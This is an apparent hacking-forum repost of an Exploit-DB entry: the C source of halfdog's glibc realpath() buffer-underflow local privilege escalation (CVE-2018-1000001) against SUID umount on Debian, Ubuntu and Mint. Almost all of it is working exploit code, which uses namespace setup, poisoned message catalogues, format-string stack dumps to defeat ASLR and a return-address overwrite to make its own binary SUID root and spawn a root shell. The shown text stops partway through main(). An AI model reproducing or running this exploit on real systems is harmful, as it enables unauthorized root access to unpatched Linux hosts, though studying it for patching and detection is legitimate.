Exploit glibc < 2.26 - 'getcwd()' Local Privilege Escalation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
43775
Проверка EDB
  1. Пройдено
Автор
HALFDOG
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
cve-2018-1000001
Дата публикации
2018-01-16
glibc < 2.26 - 'getcwd()' Local Privilege Escalation
C:
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2018 halfdog <me (%) halfdog.net>
 *  See https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ for more information.
 *
 *  This tool exploits a buffer underflow in glibc realpath()
 *  and was tested against latest release from Debian, Ubuntu
 *  Mint. It is intended as demonstration of ASLR-aware exploitation
 *  techniques. It uses relative binary offsets, that may be different
 *  for various Linux distributions and builds. Please send me
 *  a patch when you developed a new set of parameters to add
 *  to the osSpecificExploitDataList structure and want to contribute
 *  them.
 *
 *  Compile: gcc -o RationalLove RationalLove.c
 *  Run: ./RationalLove
 *
 *  You may also use "--Pid" parameter, if you want to test the
 *  program on already existing namespaced or chrooted mounts.
 */

#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <poll.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>


#define UMOUNT_ENV_VAR_COUNT 256

/** Dump that number of bytes from stack to perform anti-ASLR.
 *  This number should be high enough to reproducible reach the
 *  stack region sprayed with (UMOUNT_ENV_VAR_COUNT*8) bytes of
 *  environment variable references but low enough to avoid hitting
 *  upper stack limit, which would cause a crash.
 */
#define STACK_LONG_DUMP_BYTES 4096

char *messageCataloguePreamble="Language: en\n"
    "MIME-Version: 1.0\n"
    "Content-Type: text/plain; charset=UTF-8\n"
    "Content-Transfer-Encoding: 8bit\n";

/** The pid of a namespace process with the working directory
 *  at a writable /tmp only visible by the process. */
pid_t namespacedProcessPid=-1;

int killNamespacedProcessFlag=1;

/** The pathname to the umount binary to execute. */
char *umountPathname;

/** The pathname to the named pipe, that will synchronize umount
 *  binary with supervisory process before triggering the second
 *  and last exploitation phase.
 */
char *secondPhaseTriggerPipePathname;

/** The pathname to the second phase exploitation catalogue file.
 *  This is needed as the catalogue cannot be sent via the trigger
 *  pipe from above.
 */
char *secondPhaseCataloguePathname;

/** The OS-release detected via /etc/os-release. */
char *osRelease=NULL;

/** This table contains all relevant information to adapt the
 *  attack to supported Linux distros (fully updated) to support
 *  also older versions, hash of umount/libc/libmount should be
 *  used also for lookups.
 *  The 4th string is an array of 4-byte integers with the offset
 *  values for format string generation. Values specify:
 *  * Stack position (in 8 byte words) for **argv
 *  * Stack position of argv[0]
 *  * Offset from __libc_start_main return position from main()
 *    and system() function, first instruction after last sigprocmask()
 *    before execve call.
 */
#define ED_STACK_OFFSET_CTX 0
#define ED_STACK_OFFSET_ARGV 1
#define ED_STACK_OFFSET_ARG0 2
#define ED_LIBC_GETDATE_DELTA 3
#define ED_LIBC_EXECL_DELTA 4
static char* osSpecificExploitDataList[]={
// Debian Stretch
    "\"9 (stretch)\"",
    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
    "from_archive",
// Delta for Debian Stretch "2.24-11+deb9u1"
    "\x06\0\0\0\x24\0\0\0\x3e\0\0\0\x7f\xb9\x08\x00\x4f\x86\x09\x00",
// Ubuntu Xenial libc=2.23-0ubuntu9
    "\"16.04.3 LTS (Xenial Xerus)\"",
    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
    "_nl_load_locale_from_archive",
    "\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
// Linux Mint 18.3 Sylvia - same parameters as "Ubuntu Xenial"
    "\"18.3 (Sylvia)\"",
    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
    "_nl_load_locale_from_archive",
    "\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
    NULL};

char **osReleaseExploitData=NULL;

/** Locate the umount binary within the given search path list,
 *  elements separated by colons.
 *  @return a pointer to a malloced memory region containing the
 *  string or NULL if not found.
 */
char* findUmountBinaryPathname(char *searchPath) {
  char *testPathName=(char*)malloc(PATH_MAX);
  assert(testPathName);

  while(*searchPath) {
    char *endPtr=strchr(searchPath, ':');
    int length=endPtr-searchPath;
    if(!endPtr) {
      length=strlen(searchPath);
      endPtr=searchPath+length-1;
    }
    int result=snprintf(testPathName, PATH_MAX, "%.*s/%s", length,
        searchPath, "umount");
    if(result>=PATH_MAX) {
      fprintf(stderr, "Binary search path element too long, ignoring it.\n");
    } else {
      struct stat statBuf;
      result=stat(testPathName, &statBuf);
// Just assume, that umount is owner-executable. There might be
// alternative ACLs, which grant umount execution only to selected
// groups, but it would be unusual to have different variants
// of umount located searchpath on the same host.
      if((!result)&&(S_ISREG(statBuf.st_mode))&&(statBuf.st_mode&S_IXUSR)) {
        return(testPathName);
      }
    }
    searchPath=endPtr+1;
  }

  free(testPathName);
  return(NULL);
}


/** Get the value for a given field name.
 *  @return NULL if not found, a malloced string otherwise.
 */
char* getReleaseFileField(char *releaseData, int dataLength, char *fieldName) {
  int nameLength=strlen(fieldName);
  while(dataLength>0) {
    char *nextPos=memchr(releaseData, '\n', dataLength);
    int lineLength=dataLength;
    if(nextPos) {
      lineLength=nextPos-releaseData;
      nextPos++;
    } else {
      nextPos=releaseData+dataLength;
    }
    if((!strncmp(releaseData, fieldName, nameLength))&&
        (releaseData[nameLength]=='=')) {
      return(strndup(releaseData+nameLength+1, lineLength-nameLength-1));
    }
    releaseData=nextPos;
    dataLength-=lineLength;
  }
  return(NULL);
}


/** Detect the release by reading the VERSION field from /etc/os-release.
 *  @return 0 on success.
 */
int detectOsRelease() {
  int handle=open("/etc/os-release", O_RDONLY);
  if(handle<0)
    return(-1);

  char *buffer=alloca(1024);
  int infoLength=read(handle, buffer, 1024);
  close(handle);
  if(infoLength<0)
    return(-1);
  osRelease=getReleaseFileField(buffer, infoLength, "VERSION");
  if(!osRelease)
    osRelease=getReleaseFileField(buffer, infoLength, "NAME");
  if(osRelease) {
    fprintf(stderr, "Detected OS version: %s\n", osRelease);
    return(0);
  }

  return(-1);
}


/** Create the catalogue data in memory.
 *  @return a pointer to newly allocated catalogue data memory
 */
char* createMessageCatalogueData(char **origStringList, char **transStringList,
    int stringCount, int *catalogueDataLength) {
  int contentLength=strlen(messageCataloguePreamble)+2;
  for(int stringPos=0; stringPos<stringCount; stringPos++) {
    contentLength+=strlen(origStringList[stringPos])+
        strlen(transStringList[stringPos])+2;
  }
  int preambleLength=(0x1c+0x14*(stringCount+1)+0xc)&-0xf;
  char *catalogueData=(char*)malloc(preambleLength+contentLength);
  memset(catalogueData, 0, preambleLength);
  int *preambleData=(int*)catalogueData;
  *preambleData++=0x950412de;
  preambleData++;
  *preambleData++=stringCount+1;
  *preambleData++=0x1c;
  *preambleData++=(*(preambleData-2))+(stringCount+1)*sizeof(int)*2;
  *preambleData++=0x5;
  *preambleData++=(*(preambleData-3))+(stringCount+1)*sizeof(int)*2;

  char *nextCatalogueStringStart=catalogueData+preambleLength;
  for(int stringPos=-1; stringPos<stringCount; stringPos++) {
    char *writeString=(stringPos<0)?"":origStringList[stringPos];
    int length=strlen(writeString);
    *preambleData++=length;
    *preambleData++=(nextCatalogueStringStart-catalogueData);
    memcpy(nextCatalogueStringStart, writeString, length+1);
    nextCatalogueStringStart+=length+1;
  }
  for(int stringPos=-1; stringPos<stringCount; stringPos++) {
    char *writeString=(stringPos<0)?messageCataloguePreamble:transStringList[stringPos];
    int length=strlen(writeString);
    *preambleData++=length;
    *preambleData++=(nextCatalogueStringStart-catalogueData);
    memcpy(nextCatalogueStringStart, writeString, length+1);
    nextCatalogueStringStart+=length+1;
  }
  assert(nextCatalogueStringStart-catalogueData==preambleLength+contentLength);
  for(int stringPos=0; stringPos<=stringCount+1; stringPos++) {
//    *preambleData++=(stringPos+1);
    *preambleData++=(int[]){1, 3, 2, 0, 4}[stringPos];
  }
  *catalogueDataLength=preambleLength+contentLength;
  return(catalogueData);
}


/** Create the catalogue data from the string lists and write
 *  it to the given file.
 *  @return 0 on success.
 */
int writeMessageCatalogue(char *pathName, char **origStringList,
    char **transStringList, int stringCount) {
  int catalogueFd=open(pathName, O_WRONLY|O_CREAT|O_TRUNC|O_NOCTTY, 0644);
  if(catalogueFd<0) {
    fprintf(stderr, "Failed to open catalogue file %s for writing.\n",
        pathName);
    return(-1);
  }
  int catalogueDataLength;
  char *catalogueData=createMessageCatalogueData(
      origStringList, transStringList, stringCount, &catalogueDataLength);
  int result=write(catalogueFd, catalogueData, catalogueDataLength);
  assert(result==catalogueDataLength);
  close(catalogueFd);
  free(catalogueData);
  return(0);
}

void createDirectoryRecursive(char *namespaceMountBaseDir, char *pathName) {
  char pathBuffer[PATH_MAX];
  int pathNameLength=0;
  while(1) {
    char *nextPathSep=strchr(pathName+pathNameLength, '/');
    if(nextPathSep) {
      pathNameLength=nextPathSep-pathName;
    } else {
      pathNameLength=strlen(pathName);
    }
    int result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/%.*s",
        namespaceMountBaseDir, pathNameLength, pathName);
    assert(result<PATH_MAX);
    result=mkdir(pathBuffer, 0755);
    assert((!result)||(errno==EEXIST));
    if(!pathName[pathNameLength])
      break;
    pathNameLength++;
  }
}


/** This child function prepares the namespaced mount point and
 *  then waits to be killed later on.
 */
static int usernsChildFunction() {
  while(geteuid()!=0) {
    sched_yield();
  }
  int result=mount("tmpfs", "/tmp", "tmpfs", MS_MGC_VAL, NULL);
  assert(!result);
  assert(!chdir("/tmp"));
  int handle=open("ready", O_WRONLY|O_CREAT|O_EXCL|O_NOFOLLOW|O_NOCTTY, 0644);
  assert(handle>=0);
  close(handle);
  sleep(100000);
}

/** Prepare a process living in an own mount namespace and setup
 *  the mount structure appropriately. The process is created
 *  in a way allowing cleanup at program end by just killing it,
 *  thus removing the namespace.
 *  @return the pid of that process or -1 on error.
 */
pid_t prepareNamespacedProcess() {
  if(namespacedProcessPid==-1) {
    fprintf(stderr, "No pid supplied via command line, trying to create a namespace\nCAVEAT: /proc/sys/kernel/unprivileged_userns_clone must be 1 on systems with USERNS protection.\n");

    char *stackData=(char*)malloc(1<<20);
    assert(stackData);
    namespacedProcessPid=clone(usernsChildFunction, stackData+(1<<20),
        CLONE_NEWUSER|CLONE_NEWNS|SIGCHLD, NULL);
    if(namespacedProcessPid==-1) {
      fprintf(stderr, "USERNS clone failed: %d (%s)\n", errno, strerror(errno));
      return(-1);
    }

    char idMapFileName[128];
    char idMapData[128];
    sprintf(idMapFileName, "/proc/%d/setgroups", namespacedProcessPid);
    int setGroupsFd=open(idMapFileName, O_WRONLY);
    assert(setGroupsFd>=0);
    int result=write(setGroupsFd, "deny", 4);
    assert(result>0);
    close(setGroupsFd);

    sprintf(idMapFileName, "/proc/%d/uid_map", namespacedProcessPid);
    int uidMapFd=open(idMapFileName, O_WRONLY);
    assert(uidMapFd>=0);
    sprintf(idMapData, "0 %d 1\n", getuid());
    result=write(uidMapFd, idMapData, strlen(idMapData));
    assert(result>0);
    close(uidMapFd);

    sprintf(idMapFileName, "/proc/%d/gid_map", namespacedProcessPid);
    int gidMapFd=open(idMapFileName, O_WRONLY);
    assert(gidMapFd>=0);
    sprintf(idMapData, "0 %d 1\n", getgid());
    result=write(gidMapFd, idMapData, strlen(idMapData));
    assert(result>0);
    close(gidMapFd);

// After setting the maps for the child process, the child may
// start setting up the mount point. Wait for that to complete.
    sleep(1);
    fprintf(stderr, "Namespaced filesystem created with pid %d\n",
        namespacedProcessPid);
  }

  osReleaseExploitData=osSpecificExploitDataList;
  if(osRelease) {
// If an OS was detected, try to find it in list. Otherwise use
// default.
    for(int tPos=0; osSpecificExploitDataList[tPos]; tPos+=4) {
      if(!strcmp(osSpecificExploitDataList[tPos], osRelease)) {
        osReleaseExploitData=osSpecificExploitDataList+tPos;
        break;
      }
    }
  }

  char pathBuffer[PATH_MAX];
  int result=snprintf(pathBuffer, sizeof(pathBuffer), "/proc/%d/cwd",
     namespacedProcessPid);
  assert(result<PATH_MAX);
  char *namespaceMountBaseDir=strdup(pathBuffer);
  assert(namespaceMountBaseDir);

// Create directories needed for umount to proceed to final state
// "not mounted".
  createDirectoryRecursive(namespaceMountBaseDir, "(unreachable)/x");
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES", osReleaseExploitData[2]);
  assert(result<PATH_MAX);
  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "(unreachable)/tmp/%s/X.X/LC_MESSAGES", osReleaseExploitData[2]);
  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "(unreachable)/tmp/%s/X.x/LC_MESSAGES", osReleaseExploitData[2]);
  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);

// Create symlink to trigger underflows.
  result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/(unreachable)/tmp/down",
      namespaceMountBaseDir);
  assert(result<PATH_MAX);
  result=symlink(osReleaseExploitData[1], pathBuffer);
  assert(!result||(errno==EEXIST));

// getdate will leave that string in rdi to become the filename
// to execute for the next round.
  char *selfPathName=realpath("/proc/self/exe", NULL);
  result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/DATEMSK",
      namespaceMountBaseDir);
  assert(result<PATH_MAX);
  int handle=open(pathBuffer, O_WRONLY|O_CREAT|O_TRUNC, 0755);
  assert(handle>0);
  result=snprintf(pathBuffer, sizeof(pathBuffer), "#!%s\nunused",
      selfPathName);
  assert(result<PATH_MAX);
  result=write(handle, pathBuffer, result);
  close(handle);
  free(selfPathName);

// Write the initial message catalogue to trigger stack dumping
// and to make the "umount" call privileged by toggling the "restricted"
// flag in the context.
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "%s/(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES/util-linux.mo",
      namespaceMountBaseDir, osReleaseExploitData[2]);
  assert(result<PATH_MAX);

  char *stackDumpStr=(char*)malloc(0x80+6*(STACK_LONG_DUMP_BYTES/8));
  assert(stackDumpStr);
  char *stackDumpStrEnd=stackDumpStr;
  stackDumpStrEnd+=sprintf(stackDumpStrEnd, "AA%%%d$lnAAAAAA",
      ((int*)osReleaseExploitData[3])[ED_STACK_OFFSET_CTX]);
  for(int dumpCount=(STACK_LONG_DUMP_BYTES/8); dumpCount; dumpCount--) {
    memcpy(stackDumpStrEnd, "%016lx", 6);
    stackDumpStrEnd+=6;
  }
// We wrote allready 8 bytes, write so many more to produce a
// count of 'L' and write that to the stack. As all writes so
// sum up to a count aligned by 8, and 'L'==0x4c, we will have
// to write at least 4 bytes, which is longer than any "%hhx"
// format string output. Hence do not care about the byte content
// here. The target write address has a 16 byte alignment due
// to varg structure.
  stackDumpStrEnd+=sprintf(stackDumpStrEnd, "%%1$%dhhx%%%d$hhn",
      ('L'-8-STACK_LONG_DUMP_BYTES*2)&0xff,
      STACK_LONG_DUMP_BYTES/16);
  *stackDumpStrEnd=0;
  result=writeMessageCatalogue(pathBuffer,
      (char*[]){
          "%s: mountpoint not found",
          "%s: not mounted",
          "%s: target is busy\n        (In some cases useful info about processes that\n         use the device is found by lsof(8) or fuser(1).)"
      },
      (char*[]){"1234", stackDumpStr, "5678"},
      3);
  assert(!result);
  free(stackDumpStr);

  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "%s/(unreachable)/tmp/%s/X.X/LC_MESSAGES/util-linux.mo",
      namespaceMountBaseDir, osReleaseExploitData[2]);
  assert(result<PATH_MAX);
  result=mknod(pathBuffer, S_IFIFO|0666, S_IFIFO);
  assert((!result)||(errno==EEXIST));
  secondPhaseTriggerPipePathname=strdup(pathBuffer);

  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "%s/(unreachable)/tmp/%s/X.x/LC_MESSAGES/util-linux.mo",
      namespaceMountBaseDir, osReleaseExploitData[2]);
  secondPhaseCataloguePathname=strdup(pathBuffer);

  free(namespaceMountBaseDir);
  return(namespacedProcessPid);
}



/** Create the format string to write an arbitrary value to the
 *  stack. The created format string avoids to interfere with
 *  the complex fprintf format handling logic by accessing fprintf
 *  internal state on stack. Thus the modification method does
 *  not depend on that ftp internals. The current libc fprintf
 *  implementation copies values for formatting before applying
 *  the %n writes, therefore pointers changed by fprintf operation
 *  can only be utilized with the next fprintf invocation. As
 *  we cannot rely on a stack having a suitable number of pointers
 *  ready for arbitrary writes, we need to create those pointers
 *  one by one. Everything needed is pointer on stack pointing
 *  to another valid pointer and 4 helper pointers pointing to
 *  writeable memory. The **argv list matches all those requirements.
 *  @param printfArgvValuePos the position of the argv pointer from
 *  printf format string view.
 *  @param argvStackAddress the address of the argv list, where
 *  the argv[0] pointer can be read.
 *  @param printfArg0ValuePos the position of argv list containing
 *  argv[0..n] pointers.
 *  @param mainFunctionReturnAddress the address on stack where
 *  the return address from the main() function to _libc_start()
 *  is stored.
 *  @param writeValue the value to write to mainFunctionReturnAddress
 */
void createStackWriteFormatString(
    char *formatBuffer, int bufferSize, int printfArgvValuePos,
    void *argvStackAddress, int printfArg0ValuePos,
    void *mainFunctionReturnAddress, unsigned short *writeData,
    int writeDataLength) {
  int result=0;
  int currentValue=-1;
  for(int nextWriteValue=0; nextWriteValue<0x10000;) {
// Find the lowest value to write.
    nextWriteValue=0x10000;
    for(int valuePos=0; valuePos<writeDataLength; valuePos++) {
       int value=writeData[valuePos];
       if((value>currentValue)&&(value<nextWriteValue))
         nextWriteValue=value;
    }
    if(currentValue<0)
      currentValue=0;
    if(currentValue!=nextWriteValue) {
      result=snprintf(formatBuffer, bufferSize, "%%1$%1$d.%1$ds",
          nextWriteValue-currentValue);
      formatBuffer+=result;
      bufferSize-=result;
      currentValue=nextWriteValue;
    }
    for(int valuePos=0; valuePos<writeDataLength; valuePos++) {
       if(writeData[valuePos]==nextWriteValue) {
          result=snprintf(formatBuffer, bufferSize,
              "%%%d$hn", printfArg0ValuePos+valuePos+1);
          formatBuffer+=result;
          bufferSize-=result;
       }
    }
  }

// Print the return function address location number of bytes
// except 8 (those from the LABEL counter) and write the value
// to arg1.
  int writeCount=((int)mainFunctionReturnAddress-18)&0xffff;
  result=snprintf(formatBuffer, bufferSize,
      "%%1$%d.%ds%%1$s%%1$s%%%d$hn",
      writeCount, writeCount, printfArg0ValuePos);
  formatBuffer+=result;
  bufferSize-=result;

// Write the LABEL 6 more times, thus multiplying the the single
// byte write pointer to an 8-byte aligned argv-list pointer and
// update argv[0] to point to argv[1..n].
  writeCount=(((int)argvStackAddress)-(writeCount+56))&0xffff;
  result=snprintf(formatBuffer, bufferSize,
      "%%1$s%%1$s%%1$s%%1$s%%1$s%%1$s%%1$%d.%ds%%%d$hn",
      writeCount, writeCount, printfArgvValuePos);
  formatBuffer+=result;
  bufferSize-=result;

// Append a debugging preamble.
  result=snprintf(formatBuffer, bufferSize, "-%%35$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%78$s\n",
      printfArgvValuePos, printfArg0ValuePos-1, printfArg0ValuePos,
      printfArg0ValuePos+1, printfArg0ValuePos+2, printfArg0ValuePos+3,
      printfArg0ValuePos+4, printfArg0ValuePos+5, printfArg0ValuePos+6);
  formatBuffer+=result;
  bufferSize-=result;
}


/** Wait for the trigger pipe to open. The pipe will be closed
 *  immediately after opening it.
 *  @return 0 when the pipe was opened before hitting a timeout.
 */
int waitForTriggerPipeOpen(char *pipeName) {
  struct timespec startTime, currentTime;
  int result=clock_gettime(CLOCK_MONOTONIC, &startTime);
  startTime.tv_sec+=10;
  assert(!result);
  while(1) {
    int pipeFd=open(pipeName, O_WRONLY|O_NONBLOCK);
    if(pipeFd>=0) {
      close(pipeFd);
      break;
    }
    result=clock_gettime(CLOCK_MONOTONIC, &currentTime);
    if(currentTime.tv_sec>startTime.tv_sec) {
      return(-1);
    }
    currentTime.tv_sec=0;
    currentTime.tv_nsec=100000000;
    nanosleep(&currentTime, NULL);
  }
  return(0);
}


/** Invoke umount to gain root privileges.
 *  @return 0 if the umount process terminated with expected exit
 *  status.
 */
int attemptEscalation() {
  int escalationSuccess=-1;

  char targetCwd[64];
  snprintf(
      targetCwd, sizeof(targetCwd)-1, "/proc/%d/cwd", namespacedProcessPid);

  int pipeFds[2];
  int result=pipe(pipeFds);
  assert(!result);

  pid_t childPid=fork();
  assert(childPid>=0);
  if(!childPid) {
// This is the child process.
    close(pipeFds[0]);
    fprintf(stderr, "Starting subprocess\n");
    dup2(pipeFds[1], 1);
    dup2(pipeFds[1], 2);
    close(pipeFds[1]);
    result=chdir(targetCwd);
    assert(!result);

// Create so many environment variables for a kind of "stack spraying".
    int envCount=UMOUNT_ENV_VAR_COUNT;
    char **umountEnv=(char**)malloc((envCount+1)*sizeof(char*));
    assert(umountEnv);
    umountEnv[envCount--]=NULL;
    umountEnv[envCount--]="LC_ALL=C.UTF-8";
    while(envCount>=0) {
      umountEnv[envCount--]="AANGUAGE=X.X";
    }
// Use the built-in C locale.
// Invoke umount first by overwriting heap downwards using links
// for "down", then retriggering another error message ("busy")
// with hopefully similar same stack layout for other path "/".
    char* umountArgs[]={umountPathname, "/", "/", "/", "/", "/", "/", "/", "/", "/", "/", "down", "LABEL=78", "LABEL=789", "LABEL=789a", "LABEL=789ab", "LABEL=789abc", "LABEL=789abcd", "LABEL=789abcde", "LABEL=789abcdef", "LABEL=789abcdef0", "LABEL=789abcdef0", NULL};
    result=execve(umountArgs[0], umountArgs, umountEnv);
    assert(!result);
  }
  close(pipeFds[1]);
  int childStdout=pipeFds[0];

  int escalationPhase=0;
  char readBuffer[1024];
  int readDataLength=0;
  char stackData[STACK_LONG_DUMP_BYTES];
  int stackDataBytes=0;

  struct pollfd pollFdList[1];
  pollFdList[0].fd=childStdout;
  pollFdList[0].events=POLLIN;

// Now learn about the binary, prepare data for second exploitation
// phase. The phases should be:
// * 0: umount executes, glibc underflows and causes an util-linux.mo
//   file to be read, that contains a poisonous format string.
//   Successful poisoning results in writing of 8*'A' preamble,
//   we are looking for to indicate end of this phase.
// * 1: The poisoned process writes out stack content to defeat
//   ASLR. Reading all relevant stack end this phase.
// * 2: The poisoned process changes the "LANGUAGE" parameter,
//   thus triggering re-read of util-linux.mo. To avoid races,
//   we let umount open a named pipe, thus blocking execution.
//   As soon as the pipe is ready for writing, we write a modified
//   version of util-linux.mo to another file because the pipe
//   cannot be used for sending the content.
// * 3: We read umount output to avoid blocking the process and
//   wait for it to ROP execute fchown/fchmod and exit.
  while(1) {
    if(escalationPhase==2) {
// We cannot use the standard poll from below to monitor the pipe,
// but also we do not want to block forever. Wait for the pipe
// in nonblocking mode and then continue with next phase.
      result=waitForTriggerPipeOpen(secondPhaseTriggerPipePathname);
      if(result) {
        goto attemptEscalationCleanup;
      }
      escalationPhase++;
    }

// Wait at most 10 seconds for IO.
    result=poll(pollFdList, 1, 10000);
    if(!result) {
// We ran into a timeout. This might be the result of a deadlocked
// child, so kill the child and retry.
      fprintf(stderr, "Poll timed out\n");
      goto attemptEscalationCleanup;
    }
// Perform the IO operations without blocking.
    if(pollFdList[0].revents&(POLLIN|POLLHUP)) {
      result=read(
          pollFdList[0].fd, readBuffer+readDataLength,
          sizeof(readBuffer)-readDataLength);
      if(!result) {
        if(escalationPhase<3) {
// Child has closed the socket unexpectedly.
          goto attemptEscalationCleanup;
        }
        break;
      }
      if(result<0) {
        fprintf(stderr, "IO error talking to child\n");
        goto attemptEscalationCleanup;
      }
      readDataLength+=result;

// Handle the data depending on escalation phase.
      int moveLength=0;
      switch(escalationPhase) {
        case 0: // Initial sync: read A*8 preamble.
          if(readDataLength<8)
            continue;
          char *preambleStart=memmem(readBuffer, readDataLength,
              "AAAAAAAA", 8);
          if(!preambleStart) {
// No preamble, move content only if buffer is full.
            if(readDataLength==sizeof(readBuffer))
              moveLength=readDataLength-7;
            break;
          }
// We found, what we are looking for. Start reading the stack.
          escalationPhase++;
          moveLength=preambleStart-readBuffer+8;
        case 1: // Read the stack.
// Consume stack data until or local array is full.
          while(moveLength+16<=readDataLength) {
            result=sscanf(readBuffer+moveLength, "%016lx",
                (int*)(stackData+stackDataBytes));
            if(result!=1) {
// Scanning failed, the data injection procedure apparently did
// not work, so this escalation failed.
              goto attemptEscalationCleanup;
            }
            moveLength+=sizeof(long)*2;
            stackDataBytes+=sizeof(long);
// See if we reached end of stack dump already.
            if(stackDataBytes==sizeof(stackData))
              break;
          }
          if(stackDataBytes!=sizeof(stackData))
            break;

// All data read, use it to prepare the content for the next phase.
          fprintf(stderr, "Stack content received, calculating next phase\n");

          int *exploitOffsets=(int*)osReleaseExploitData[3];

// This is the address, where source Pointer is pointing to.
          void *sourcePointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]];
// This is the stack address source for the target pointer.
          void *sourcePointerLocation=sourcePointerTarget-0xd0;

          void *targetPointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARG0]];
// This is the stack address of the libc start function return
// pointer.
          void *libcStartFunctionReturnAddressSource=sourcePointerLocation-0x10;
          fprintf(stderr, "Found source address location %p pointing to target address %p with value %p, libc offset is %p\n",
              sourcePointerLocation, sourcePointerTarget,
              targetPointerTarget, libcStartFunctionReturnAddressSource);
// So the libcStartFunctionReturnAddressSource is the lowest address
// to manipulate, targetPointerTarget+...

          void *libcStartFunctionAddress=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]-2];
          void *stackWriteData[]={
              libcStartFunctionAddress+exploitOffsets[ED_LIBC_GETDATE_DELTA],
              libcStartFunctionAddress+exploitOffsets[ED_LIBC_EXECL_DELTA]
          };
          fprintf(stderr, "Changing return address from %p to %p, %p\n",
              libcStartFunctionAddress, stackWriteData[0],
              stackWriteData[1]);
          escalationPhase++;

          char *escalationString=(char*)malloc(1024);
          createStackWriteFormatString(
              escalationString, 1024,
              exploitOffsets[ED_STACK_OFFSET_ARGV]+1, // Stack position of argv pointer argument for fprintf
              sourcePointerTarget, // Base value to write
              exploitOffsets[ED_STACK_OFFSET_ARG0]+1, // Stack position of argv[0] pointer ...
              libcStartFunctionReturnAddressSource,
              (unsigned short*)stackWriteData,
              sizeof(stackWriteData)/sizeof(unsigned short)
          );
          fprintf(stderr, "Using escalation string %s", escalationString);

          result=writeMessageCatalogue(
              secondPhaseCataloguePathname,
              (char*[]){
                  "%s: mountpoint not found",
                  "%s: not mounted",
                  "%s: target is busy\n        (In some cases useful info about processes that\n         use the device is found by lsof(8) or fuser(1).)"
              },
              (char*[]){
                  escalationString,
                  "BBBB5678%3$s\n",
                  "BBBBABCD%s\n"},
              3);
          assert(!result);
          break;
        case 2:
        case 3:
// Wait for pipe connection and output any result from mount.
          readDataLength=0;
          break;
        default:
          fprintf(stderr, "Logic error, state %d\n", escalationPhase);
          goto attemptEscalationCleanup;
      }
      if(moveLength) {
        memmove(readBuffer, readBuffer+moveLength, readDataLength-moveLength);
        readDataLength-=moveLength;
      }
    }
  }

attemptEscalationCleanup:
// Wait some time to avoid killing umount even when exploit was
// successful.
  sleep(1);
  close(childStdout);
// It is safe to kill the child as we did not wait for it to finish
// yet, so at least the zombie process is still here.
  kill(childPid, SIGKILL);
  pid_t waitedPid=waitpid(childPid, NULL, 0);
  assert(waitedPid==childPid);

  return(escalationSuccess);
}


/** This function invokes the shell specified via environment
 *  or the default shell "/bin/sh" when undefined. The function
 *  does not return on success.
 *  @return -1 on error
 */
int invokeShell(char *shellName) {
  if(!shellName)
    shellName=getenv("SHELL");
  if(!shellName)
    shellName="/bin/sh";
  char* shellArgs[]={shellName, NULL};
  execve(shellName, shellArgs, environ);
  fprintf(stderr, "Failed to launch shell %s\n", shellName);
  return(-1);
}

int main(int argc, char **argv) {
  char *programmName=argv[0];
  int exitStatus=1;

  if(getuid()==0) {
    fprintf(stderr, "%s: you are already root, invoking shell ...\n",
        programmName);
    invokeShell(NULL);
    return(1);
  }

  if(geteuid()==0) {
    struct stat statBuf;
    int result=stat("/proc/self/exe", &statBuf);
    assert(!result);
    if(statBuf.st_uid||statBuf.st_gid) {
      fprintf(stderr, "%s: internal invocation, setting SUID mode\n",
          programmName);
      int handle=open("/proc/self/exe", O_RDONLY);
      fchown(handle, 0, 0);
      fchmod(handle, 04755);
      exit(0);
    }

    fprintf(stderr, "%s: invoked as SUID, invoking shell ...\n",
        programmName);
    setresgid(0, 0, 0);
    setresuid(0, 0, 0);
    invokeShell(NULL);
